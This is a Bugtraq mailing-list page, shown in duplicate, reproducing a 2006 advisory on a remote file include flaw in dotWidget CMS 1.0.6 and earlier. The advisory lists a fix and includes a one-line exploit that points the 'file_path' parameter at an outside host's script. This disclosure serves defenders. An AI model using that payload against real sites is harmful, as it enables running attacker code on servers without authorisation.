Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
Jun 03 2006 11:07AM
admin majorsecurity de
[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
------------------------------------------------------------------------
-------------
Software: dotWidget CMS
Version: <=1.0.6
Type: Remote File Include Vulnerability
Date: June, 2nd 2006
Vendor: dotWidget
Page: http://dotwigdet.com
Risc: High
Credits:
----------------------------
Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de
Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls7.txt
Affected Products:
----------------------------
dotWidget CMS 1.0.6 and prior
Description:
----------------------------
dotWidget CMS is content management at its easiest. Update your site's content in real-time.
Features include a built-in WYSIWYG text editor, multiple users and access levels,
customizable templates and more.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "file_path" parameter in "index.php" "feedback.php" and "printfriendly.php"
is not properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
file_path=http://www.yourspace.com/yourscript.php?
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
------------------------------------------------------------------------
-------------
Software: dotWidget CMS
Version: <=1.0.6
Type: Remote File Include Vulnerability
Date: June, 2nd 2006
Vendor: dotWidget
Page: http://dotwigdet.com
Risc: High
Credits:
----------------------------
Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de
Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls7.txt
Affected Products:
----------------------------
dotWidget CMS 1.0.6 and prior
Description:
----------------------------
dotWidget CMS is content management at its easiest. Update your site's content in real-time.
Features include a built-in WYSIWYG text editor, multiple users and access levels,
customizable templates and more.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "file_path" parameter in "index.php" "feedback.php" and "printfriendly.php"
is not properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
file_path=http://www.yourspace.com/yourscript.php?
[ reply ]